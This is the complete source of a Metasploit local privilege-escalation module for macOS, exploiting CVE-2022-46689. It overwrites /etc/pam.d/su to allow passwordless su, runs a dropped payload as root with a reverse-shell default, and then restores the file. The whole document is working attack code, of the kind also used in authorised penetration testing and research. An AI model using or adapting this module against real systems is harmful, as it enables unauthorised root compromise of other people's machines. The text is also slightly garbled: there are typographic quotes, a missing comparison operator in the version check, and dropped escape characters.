macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Post::File
include Msf::Post::OSX::Priv
include Msf::Post::OSX::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘macOS Dirty Cow Arbitrary File Write Local Privilege Escalation’,
‘Description’ => %q{
An app may be able to execute arbitrary code with kernel privileges
},
‘License’ => MSF_LICENSE,
‘Author’ => [
‘Ian Beer’, # discovery
‘Zhuowei Zhang’, # proof of concept
‘timwr’ # metasploit integration
],
‘References’ => [
[‘CVE’, ‘2022-46689’],
[‘URL’, ‘https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c’],
[‘URL’, ‘https://github.com/zhuowei/MacDirtyCowDemo’],
],
‘Platform’ => ‘osx’,
‘Arch’ => ARCH_X64,
‘SessionTypes’ => [‘shell’, ‘meterpreter’],
‘DefaultTarget’ => 0,
‘DefaultOptions’ => { ‘PAYLOAD’ => ‘osx/x64/shell_reverse_tcp’ },
‘Targets’ => [
[ ‘Mac OS X x64 (Native Payload)’, {} ],
],
‘DisclosureDate’ => ‘2022-12-17’,
‘Notes’ => {
‘SideEffects’ => [ARTIFACTS_ON_DISK, CONFIG_CHANGES],
‘Reliability’ => [REPEATABLE_SESSION],
‘Stability’ => [CRASH_SAFE]
}
)
)
register_advanced_options [
OptString.new(‘TargetFile’, [ true, ‘The pam.d file to overwrite’, ‘/etc/pam.d/su’ ]),
OptString.new(‘WritableDir’, [ true, ‘A directory where we can write files’, ‘/tmp’ ])
]
end

def check
version = Rex::Version.new(get_system_version)
if version > Rex::Version.new(‘13.0.1’)
CheckCode::Safe
elsif version Rex::Version.new(‘12.6.1’)
CheckCode::Safe
elsif version < Rex::Version.new('10.15')
CheckCode::Safe
else
CheckCode::Appears
end
end

def exploit
if is_root?
fail_with Failure::BadConfig, ‘Session already has root privileges’
end

unless writable? datastore[‘WritableDir’]
fail_with Failure::BadConfig, “#{datastore[‘WritableDir’]} is not writable”
end

payload_file = “#{datastore[‘WritableDir’]}/.#{rand_text_alphanumeric(5..10)}”
binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
upload_and_chmodx payload_file, binary_payload
register_file_for_cleanup payload_file

target_file = datastore[‘TargetFile’]
current_content = read_file(target_file)
backup_file = “#{datastore[‘WritableDir’]}/.#{rand_text_alphanumeric(5..10)}”
unless write_file(backup_file, current_content)
fail_with Failure::BadConfig, “#{backup_file} is not writable”
end
register_file_for_cleanup backup_file

replace_content = current_content.sub(‘rootok’, ‘permit’)

replace_file = “#{datastore[‘WritableDir’]}/.#{rand_text_alphanumeric(5..10)}”
unless write_file(replace_file, replace_content)
fail_with Failure::BadConfig, “#{replace_file} is not writable”
end
register_file_for_cleanup replace_file

exploit_file = “#{datastore[‘WritableDir’]}/.#{rand_text_alphanumeric(5..10)}”
exploit_exe = exploit_data ‘CVE-2022-46689’, ‘exploit’
upload_and_chmodx exploit_file, exploit_exe
register_file_for_cleanup exploit_file

exploit_cmd = “#{exploit_file} #{target_file} #{replace_file}”
print_status(“Executing exploit ‘#{exploit_cmd}'”)
result = cmd_exec(exploit_cmd)
print_status(“Exploit result:n#{result}”)

su_cmd = “echo ‘#{payload_file} & disown’ | su”
print_status(“Running cmd:n#{su_cmd}”)
result = cmd_exec(su_cmd)
unless result.blank?
print_status(“Command output:n#{result}”)
end

exploit_cmd = “#{exploit_file} #{target_file} #{backup_file}”
print_status(“Executing exploit (restoring) ‘#{exploit_cmd}'”)
result = cmd_exec(exploit_cmd)
print_status(“Exploit result:n#{result}”)
end

end